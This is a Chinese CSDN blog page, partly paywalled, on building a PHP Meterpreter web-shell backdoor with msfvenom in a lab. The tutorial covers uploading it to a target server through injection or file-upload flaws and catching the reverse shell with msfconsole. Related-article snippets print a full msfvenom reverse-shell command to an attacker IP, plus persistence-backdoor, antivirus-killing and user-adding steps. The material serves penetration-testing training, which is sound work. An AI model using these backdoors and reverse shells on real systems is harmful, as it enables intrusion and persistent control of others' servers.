PHP Meterpreter后门

最新推荐文章于 2025-05-11 16:28:29 发布

原创

最新推荐文章于 2025-05-11 16:28:29 发布 · 1.7k 阅读

1 ·

CC 4.0 BY-SA版权

文章标签：

#php #linux #shell #web

本文介绍了如何使用Metasploit的msfvenom工具制作PHP Meterpreter后门，并详细阐述了如何将其上传到目标主机，通过设置监听模块和配置参数，最终实现反弹shell并渗透目标主机的过程。

Metasploit有一个名为PHP Meterpreter的payload。这个模块可以创建具有Meterpreter功能的PHP Web shell。利用目标的漏洞（常见的注入和上传漏洞）之后，再把它的shell传到目标主机即可。

实验环境

系统:Kali2019
iP地址:192.168.1.15
使用工具: PHP Meterpreter

**目标主机
系统：Windows2008
iP地址:192.168.1.14

任务实施

使用Metasploit的msfvenom工具制作PHP Meterpreter**

-p:指定payload为php/meterpreter/reverse_tcp
-f:设置输出格式（raw）
LPORT：设定连接端口（默认4444）
LHOST：设定攻击主机的IP地址

完成以上操作后可使用ls查看后门文件是否生成成功
在这里插入图片描述
在通过正常途径，或者利用注入、远程文件包含漏洞等Web漏洞之后,将test2.php后门文件上传到目标服务器，接着启动msfconsole，使用以下命令设置监听。

在这里插入图片描述

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Admin_Shell

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

渗透测试window7，加强木马防范意识

yuanyuan2223的博客

04-06

5798

渗透测试window7，加强木马防范意识通过钓鱼网站给win7系统植入后门并控制的流程一、知识点总结： 1 生成后门程序 2 通过钓鱼方式植入木马靶机（社工） 3 使用Metasploit配置监控并控制靶机 4 控制靶机我们能做什么二、用到的系统和工具： 1 Kali(系统)； 2 Windows7（靶机系统）； 3 Metasploit（渗透工具）； 4 msfvenom（Metasploit自带的后门生成模块）； 5 Meterpreter（后渗透常用通道）；三、使用msfvenom开始生成木马

meterpreter后渗透之权限维持

weixin_44255856的博客

08-09

3203

Persistence后门使用此方法建议运行前关闭杀毒软件 Run post/windows/manage/killav 输入run persistence -S -U -X -i 5 -p 6666 -r 192.168.85.130创建一个持久性的后门。详细信息如下： -A 自动启动一个匹配的漏洞/多/处理程序来连接到代理 -L如果不使用%TEMP%，则选择目标主机中写入有效负载的...

参与评论您还未登录，请先登录后发表或查看评论

php Meterpreter Webshell

iteye_16188的博客

11-17

463

1. msfvenom -p php/meterpreter/reverse_tcp LHOST=Attacker's_IP LPORT=443 T > ./a.php 2. 上传a.php到web服务器 3. 启动msfconsole 4. use multi/handler 5. set LHOST Attacker's_IP 6. set LPORT 443 7. set ...

获取meterpreter权限后如何留后门

黑锤的博客

09-21

2647

我们知道当我们拿到主机meterpreter权限是可以留后门进行持久化攻击，常见的cmd命令创建文本，并向里出入内容，并打开： echo "hello I am hacker" >>1.txt 之后再打开：notepad 1.txt即可拿永恒之蓝来说得到meterpreter后想要利用3389进行远程登录就得需要用户账号密码，一下有两种方法创建账号方法一：利用msf的post后渗透攻击模块直接在直接在meterpreter下创建，这种创建的账号直接就是administrat

Metasploit应用笔记-msfvenom生成meterpreter后门代码

oneVs1的专栏

02-28

1万+

1 用msfvenom生成c语言格式的shellcode. windows/meterpreter/reverse_http是shellcode, X86/shikata_ga_nai是指定对shellcode的编码方法，-i 3 是指定编码次数，LHOST LPORT是shellcode要使用的参数，表示shellcode运行是连接的IP地址和端口。-f c 指定shellcode的c

Metasploit 生成各种后门

优快云

01-13

1万+

Metasploit 是一款开源的安全漏洞检测工具，可以帮助安全和IT专业人士识别安全性问题，验证漏洞的缓解措施，同时该工具也是渗透测试环境中的利器，它支持多平台Payload的生成具有完全的跨平台性，本次实验将学会生成各种攻击载荷。linux系统下只需要执行下面的三条命令既可以自动安装,不过国内网速你懂的.

meterpreter模块之后渗透攻击实战总结

MX的博客

10-11

1万+

meterpreter模块之后渗透攻击文章目录meterpreter模块之后渗透攻击一：进程迁移二：系统命令1：查看系统信息2：查看目标主机运行时间3：查看当前主机用户名及其权限4：查看完整网络设置路由信息5：关闭杀毒软件6：启动目标主机的3389端口即远程桌面协议7：将当前会话放到后台8：端口转发9：添加用户10：添加路由（先使用background将meterpreter终端放到后台）11：...

MSF_PHP后门反弹连接_DVWA文件上传木马_Metasploit配置监控及msfvenom生成攻击载荷

qq_51550750的博客

06-02

1189

msf——PHP后门反弹连接

Metasploit反弹shell.php实验（window）

最新发布

m0_51781051的博客

05-11

644

这是一种基于 PHP 的 Meterpreter shell，通过反向 TCP 协议与攻击者机器建立连接。：这是生成的恶意文件的名称。生成的文件是一个包含 PHP 代码的文件，运行后会在目标机器上执行 Meterpreter shell，并尝试与攻击者机器建立连接。这可以增加对抗检测的能力，因为每次生成的 payload 都是不同的。参数表示本地主机的 IP 地址，即攻击者机器的 IP 地址。：这是 Metasploit 框架中的一个工具，用于生成恶意负载（payload），例如木马、后门等。

Meterpreter使用总结（1）

CODING...

02-08

2万+

meterpreter是我最喜欢使用的攻击payload，经常都会使用windows/meterpreter/reverse_tcp作为携带的payload来进行测试，下面就meterpreter的基本使用进行一个总结：

Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程

Amdy_amdy的博客

08-23

3473

Metasploit中meterpreter/reverse_tcp+exploit/multi/handler攻击实战教程由于是实战，肯定要一个服务器对吗？为了不搞破坏，我这里就不用服务器了。我现在已经用另一台电脑搭建了一个网站（用phpstudy快速搭建的），这台电脑IP是：192.168.1.103；我用的是渗透测试系统Kali Linux，由于此系统是自带Metasploit，我的Kali Linux系统IP是：192.168.40.132，并且能够通过火狐浏览器正常访问到192.168.1

apache virtualhost 访问不了_Meterpreter执行不了shell原因

weixin_35779370的博客

12-28

427

声明：该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。所有话题标签：#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持#防护绕过#内网安全 #实战案例#其他笔记 #资源分享 ...

msf payload php,Metasploit（四）--Msfpayload命令

weixin_32304785的博客

03-11

602

msfpayload即将在2015年6月18日弃用，用msfvenmon替代msfpayload-hmsfpayload的帮助信息。msfpayload-l|grepwindowsmsfpayload-l|greplinuxmsfpayload-l|grepandriod列出某个平台的pyloadsmsfpayloadwindows/meterpreter/bind_t...

Meterpreter命令详解

eli的博客

05-18

1万+

0x01初识Meterpreter 1.1.什么是Meterpreter Meterpreter是Metasploit框架中的一个扩展模块，作为溢出成功以后的攻击载荷使用，攻击载荷在溢出攻击成功以后给我们返回一个控制通道。使用它作为攻击载荷能够获得目标系统的一个Meterpreter shell的链接。Meterpreter shell作为渗透模块有很多有用的功能，比如添加一个用户、隐藏一些东西、打开shell、得到用户密码、上传下载远程主机的文件、运行cmd.exe、捕捉屏幕、得到远程控制权、捕获.

渗透测试 ( 4 ) --- Meterpreter 命令详解

墨鱼菜鸡

07-11

4476

From：https://blog.youkuaiyun.com/weixin_45605352/article/details/115824811 <<Web 安全攻防(渗透测试实战指南)>> 1、初识 Meterpreter 1.1.什么是 Meterpreter Meterpreter 是 Metasploit 框架中的一...

渗透之——Metasploit渗透php-utility-belt程序

冰河的专栏

01-17

1767

转载请注明出处：https://blog.youkuaiyun.com/l1028386804/article/details/86526103 攻击机 kali 192.168.109.137 靶机：Win XP 192.168.109.141 应用程序 php-utility-belt (可以到链接：https://download.youkuaiyun.com/download/l1028386804/109...

PHP后门反弹连接DVWA

m0_57379855的博客

03-31

3404

PHP后门反弹连接DVWA环境准备操作系统准备DVWA靶场准备metasploit配置监控及攻击载荷配置监控配置攻击载荷生成php后门上传后门文件后渗透获取数据库信息环境准备操作系统准备 kali ： 192.168.202.133 win10：192.168.202.139 DVWA靶场准备 DVWA下载注意：配置DVWA环境准备PHP7.0以上，和 Nginx环境设置网站配置数据库密码与数据库设置保持一致 metasploit配置监控及攻击载荷配置监控使用handle

meterpreter详解与渗透实战